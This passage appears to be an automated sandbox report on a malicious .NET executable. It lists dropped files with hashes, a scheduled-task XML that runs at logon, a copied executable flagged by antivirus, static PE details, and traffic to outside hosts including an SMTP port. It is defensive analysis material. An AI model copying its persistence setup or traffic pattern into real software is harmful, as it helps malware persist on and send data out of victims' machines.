                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                              Malicious:true
                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2232
                                                                                                              Entropy (8bit):5.380134126512796
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:+WSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//Z+Uyus:+LHxvIIwLgZ2KRHWLOugIs
                                                                                                              MD5:83D814868CBF9068DD1444C317198A9C
                                                                                                              SHA1:6049307C35C1B0D2F83FA2AFC9CE1C4FDD7B3097
                                                                                                              SHA-256:82FC1E483B2623D07B9D4D11765CA6DE67AEB3736ADA12AEF538CC7308ECBE57
                                                                                                              SHA-512:C281867927B40CD12B10984C8678956B33278EF8C704F993597D1462A41E92D6582404294EE1B20DD4A99BF704E2854544A37447081AD9B7CC90C3ED33A82E74
                                                                                                              Malicious:false
                                                                                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0upzlxk0.dyg.psm1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1h2wj3xz.ba1.psm1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aecd2v3j.bg3.ps1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bbtkak1q.2pu.psm1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3ntqzln.rx0.ps1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_usb0cxeq.2ig.ps1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yeyeakff.ozg.psm1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yn4pcl44.e04.ps1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\tmp4794.tmp

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\kAsh3nmsgs.exe
                                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1573
                                                                                                              Entropy (8bit):5.113430814479235
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtanxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTqv
                                                                                                              MD5:7DF3A518234304E3DF5524A16E4C10EF
                                                                                                              SHA1:909109903CA581393A8713E2428AAE740EB30151
                                                                                                              SHA-256:26A2FDBCDB73D11C525187C3020899F221E0C5A5B5FFF9744C91F45FF9AC6F35
                                                                                                              SHA-512:264C8F35D422C482317A85E2DF42BCBD19A021F240D9DBEB73621B85CFBA1FDE6419EFEE21CB43C8AB58F62C7378ED5624D7FC15FD44FD00F265940F4B78BC3D
                                                                                                              Malicious:true
                                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                              C:\Users\user\AppData\Local\Temp\tmp586D.tmp

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Roaming\HHhSyZN.exe
                                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1573
                                                                                                              Entropy (8bit):5.113430814479235
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtanxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTqv
                                                                                                              MD5:7DF3A518234304E3DF5524A16E4C10EF
                                                                                                              SHA1:909109903CA581393A8713E2428AAE740EB30151
                                                                                                              SHA-256:26A2FDBCDB73D11C525187C3020899F221E0C5A5B5FFF9744C91F45FF9AC6F35
                                                                                                              SHA-512:264C8F35D422C482317A85E2DF42BCBD19A021F240D9DBEB73621B85CFBA1FDE6419EFEE21CB43C8AB58F62C7378ED5624D7FC15FD44FD00F265940F4B78BC3D
                                                                                                              Malicious:false
                                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                              C:\Users\user\AppData\Roaming\HHhSyZN.exe

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\kAsh3nmsgs.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):835072
                                                                                                              Entropy (8bit):7.73957486937244
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:ISu336AhZYD+Oxv2lVzxNpnFuR1zGUxj:Il3q2GD+Pt/gL
                                                                                                              MD5:71DBD91C836C0B016174CA9E0A2B848A
                                                                                                              SHA1:4417EBCD2635EB4F5D66707A2E2BB5440D058C5C
                                                                                                              SHA-256:DF3A573B20EBE9B8A1D4769EC25F439B2738EA14008D9BBF469234033845E6CA
                                                                                                              SHA-512:1C583039970AFCD51FD6CFA42A17BC76CAB9B410177E01A054767249AC9BC5EB341D3B109CF6A26A34D9D753F9D339CBC95D49A8AC9F52F35B361D28682F9DE0
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 79%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................... ............@.....................................S........*........................................................................... ............... ..H............text........ ...................... ..`.rsrc....*.......,..................@..@.reloc..............................@..B.......................H.......................(....0............................................W.'ISYB.R.fU[..C.G...;.....k.H.....Uqz-.w..I.s.R.+..Dy.L.9.Q.s......}G.....Fst.Fy..../....b..!5..M...1.^<...K......H.|.a\.]....<3....o.T.......8G..~....W@....0..Q......2`:..(..H....].^.8...A....s$Q.B5.......QNf..",.0....>L.].....J.B..&x...+.........c.32..}!....G.. n.WZ.%.}.V...MW..<P..8q.F.....9.X..eh.,6....B.....F8.....2.#:.Z...z:l.A[.hu.|.R...p...JN-.,...p}.i..,.i.0....e.....A2.....Q..

                                                                                                              C:\Users\user\AppData\Roaming\HHhSyZN.exe:Zone.Identifier

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\kAsh3nmsgs.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):26
                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                              Malicious:true
                                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Entropy (8bit):7.73957486937244
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                              File name:kAsh3nmsgs.exe
                                                                                                              File size:835'072 bytes
                                                                                                              MD5:71dbd91c836c0b016174ca9e0a2b848a
                                                                                                              SHA1:4417ebcd2635eb4f5d66707a2e2bb5440d058c5c
                                                                                                              SHA256:df3a573b20ebe9b8a1d4769ec25f439b2738ea14008d9bbf469234033845e6ca
                                                                                                              SHA512:1c583039970afcd51fd6cfa42a17bc76cab9b410177e01a054767249ac9bc5eb341d3b109cf6a26a34d9d753f9d339cbc95d49a8ac9f52f35b361d28682f9de0
                                                                                                              SSDEEP:24576:ISu336AhZYD+Oxv2lVzxNpnFuR1zGUxj:Il3q2GD+Pt/gL
                                                                                                              TLSH:8E05D0983611B09FC8A7C9318964DDB4A6206CBB9B0BC30395D72DEFBA1D597DE041F2
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................... ............@................................

                                                                                                              File Icon

                                                                                                              Icon Hash:323636b29699c72c

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x4cabfe
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0xCC1F1A8D [Sat Jul 9 11:07:57 2078 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              jmp dword ptr [00402000h]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xcaba80x53.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xcc0000x2a08.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xd00000xc.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x20000xc8c040xc8e00f6b6d3e737ff7de753d8d0c6926c2c87False0.8864452881922837data7.744400724877213IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0xcc0000x2a080x2c00eda927ab2af364d1f9a1109e582ebd1cFalse0.8746448863636364data7.486239477388125IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0xd00000xc0x2000da7e65977f7ad5135fc1e15bb5ff56aFalse0.041015625data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_ICON0xcc1300x244fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9797740720817644
                                                                                                              RT_GROUP_ICON0xce5800x14data1.05
                                                                                                              RT_VERSION0xce5940x288data0.46141975308641975
                                                                                                              RT_MANIFEST0xce81c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              mscoree.dll_CorExeMain

                                                                                                              Network Behavior

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 11, 2025 09:23:26.515547037 CET49733443192.168.2.4104.26.13.205
                                                                                                              Jan 11, 2025 09:23:26.515588045 CET44349733104.26.13.205192.168.2.4
                                                                                                              Jan 11, 2025 09:23:26.515795946 CET49733443192.168.2.4104.26.13.205
                                                                                                              Jan 11, 2025 09:23:26.526371002 CET49733443192.168.2.4104.26.13.205
                                                                                                              Jan 11, 2025 09:23:26.526381969 CET44349733104.26.13.205192.168.2.4
                                                                                                              Jan 11, 2025 09:23:26.987217903 CET44349733104.26.13.205192.168.2.4
                                                                                                              Jan 11, 2025 09:23:26.987317085 CET49733443192.168.2.4104.26.13.205
                                                                                                              Jan 11, 2025 09:23:26.991131067 CET49733443192.168.2.4104.26.13.205
                                                                                                              Jan 11, 2025 09:23:26.991147041 CET44349733104.26.13.205192.168.2.4
                                                                                                              Jan 11, 2025 09:23:26.991518974 CET44349733104.26.13.205192.168.2.4
                                                                                                              Jan 11, 2025 09:23:27.038960934 CET49733443192.168.2.4104.26.13.205
                                                                                                              Jan 11, 2025 09:23:27.111110926 CET49733443192.168.2.4104.26.13.205
                                                                                                              Jan 11, 2025 09:23:27.151331902 CET44349733104.26.13.205192.168.2.4
                                                                                                              Jan 11, 2025 09:23:27.223304987 CET44349733104.26.13.205192.168.2.4
                                                                                                              Jan 11, 2025 09:23:27.223376989 CET44349733104.26.13.205192.168.2.4
                                                                                                              Jan 11, 2025 09:23:27.223589897 CET49733443192.168.2.4104.26.13.205
                                                                                                              Jan 11, 2025 09:23:27.230345964 CET49733443192.168.2.4104.26.13.205
                                                                                                              Jan 11, 2025 09:23:28.174760103 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:28.179642916 CET5874973477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:23:28.179733038 CET49734587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:23:29.023623943 CET5874973477.88.21.158192.168.2.4
